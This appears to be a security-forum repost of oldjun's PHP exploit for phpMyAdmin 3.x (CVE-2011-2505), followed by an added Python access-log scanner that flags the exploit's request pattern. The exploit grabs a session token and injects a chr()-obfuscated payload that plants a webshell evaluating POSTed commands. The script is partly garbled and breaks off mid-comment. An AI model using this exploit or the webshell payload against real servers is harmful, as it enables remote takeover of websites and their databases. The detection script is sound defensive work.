phpMyAdmin 3.x Remote Code Execution Vulnerability: PHP version exploit. Old webmaster from t00ls.
In fact, an EXP already existed earlier. I heard that it was very "chicken ribs" (jilei), so I didn't pay attention to it at the time. Talking about this, it is difficult to find the phpMyAdmin directory these days, and a few 3.x versions are also in use. However, after the study, I said that this 0-day is not a problem. Khan ~~~ It's just me. Got it.
PHP version EXP written by Lao Jun Daniel:
#!/usr/bin/php
cute exploit [Not jilei(chicken\'s ribs)]by oldjun(www.oldjun.com)welcome to www.t00ls.netmail: oldjun@gmail.comAssigned CVE id: CVE-2011-2505+---------------------------------------------------------------------------+\'); /** * working when the directory:"config" exists and is writeable.**/ if ($argc < 3) { print_r(\'+---------------------------------------------------------------------------+Usage: php \'.$argv[0].\' host pathhost: target server (ip/hostname)path: path to pma3Example:php \'.$argv[0].\' localhost /pma/+---------------------------------------------------------------------------+\'); exit;} $host = $argv[1];$path = $argv[2]; /** * Try to determine if the directory:"config" exists**/echo "[+] Try to determine if the directory:config exists....n";$returnstr=php_request(\'config/\');if(strpos($returnstr,\'404\')){ exit("[-] Exploit Failed! The directory:config do not exists!n");} /** * Try to get token and sessionid**/echo "[+] Try to get token and sessionid....n";$result=php_request(\'index.php\');preg_match(\'/phpMyAdmin=(w{32,40});(.*?)token=(w{32})&/s\', $result, $resp);$token=$resp[3];$sessionid=$resp[1];if($token && $sessionid){ echo "[+] token:$tokenn"; echo "[+] Session ID:$sessionidn";}else{ exit("[-] Can\'t get token and Session ID,Exploit Failed!n");} /** * Try to insert shell into session**/echo "[+] Try to insert shell into 
session....n";php_request(\'db_create.php?token=\'.$token.\'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net\',\'\',\'phpMyAdmin=\'.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here. /** * Try to create webshell |
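A log-side check for the request pattern the exploit above relies on: client-supplied `_SESSION[...]` and `session_to_unset` query parameters sent to a phpMyAdmin script, preceded by a probe of the `config/` directory. This is an added example, not part of the original post or of oldjun's code; the log lines, addresses and indicator names are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines (combined log format); all values are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jul/2011:10:00:01 +0000] "GET /pma/index.php HTTP/1.1" 200 8123
192.0.2.10 - - [10/Jul/2011:10:00:02 +0000] "GET /pma/db_create.php?token=0123456789abcdef0123456789abcdef&session_to_unset=x&_SESSION%5BConfigFile%5D%5BServers%5D%5BPLACEHOLDER%5D%5Bhost%5D=example HTTP/1.1" 200 512
198.51.100.7 - - [10/Jul/2011:10:05:00 +0000] "GET /pma/sql.php?db=shop&table=orders&token=0123456789abcdef0123456789abcdef HTTP/1.1" 200 4410
192.0.2.10 - - [10/Jul/2011:10:00:03 +0000] "GET /pma/config/ HTTP/1.1" 403 210
"""

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the indicator names found in one request target."""
    path, _sep, query = target.partition("?")
    # parse_qsl percent-decodes names, so %5FSESSION%5B... is caught too.
    names = [name for name, _value in parse_qsl(query, keep_blank_values=True)]
    hits = []
    # A browser never sends session superglobal keys; the script name is
    # ignored because the post notes that almost any pma3 PHP file works.
    if any(n == "_SESSION" or n.startswith("_SESSION[") for n in names):
        hits.append("session-superglobal-param")
    if "session_to_unset" in names:
        hits.append("session_to_unset-param")
    # Weak signal on its own: the exploit first checks that config/ exists.
    if unquote(path).rstrip("/").endswith("/config"):
        hits.append("config-dir-probe")
    return hits

def scan(log_text):
    """Map client IP -> list of (indicator, HTTP status) in log order."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        ip, _method, target, status = m.groups()
        for hit in classify(target):
            findings.setdefault(ip, []).append((hit, status))
    return findings

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, hits)
```

Only query strings appear in access logs, so parameters sent in a POST body need the same check at a WAF or in application logging. The exploit's stated precondition, a `config` directory that exists and is writable, is also worth auditing on each phpMyAdmin install.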